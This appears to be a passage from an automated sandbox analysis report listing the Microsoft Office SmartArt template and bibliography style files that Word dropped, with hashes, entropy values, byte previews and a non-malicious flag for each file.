                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6024
                                                                                                                                                Entropy (8bit):7.886254023824049
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9191
                                                                                                                                                Entropy (8bit):7.93263830735235
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4326
                                                                                                                                                Entropy (8bit):7.821066198539098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):7370
                                                                                                                                                Entropy (8bit):7.9204386289679745
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5596
                                                                                                                                                Entropy (8bit):7.875182123405584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3683
                                                                                                                                                Entropy (8bit):7.772039166640107
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4888
                                                                                                                                                Entropy (8bit):7.8636569313247335
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6448
                                                                                                                                                Entropy (8bit):7.897260397307811
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5630
                                                                                                                                                Entropy (8bit):7.87271654296772
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6193
                                                                                                                                                Entropy (8bit):7.855499268199703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3075
                                                                                                                                                Entropy (8bit):7.716021191059687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5151
                                                                                                                                                Entropy (8bit):7.859615916913808
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):333258
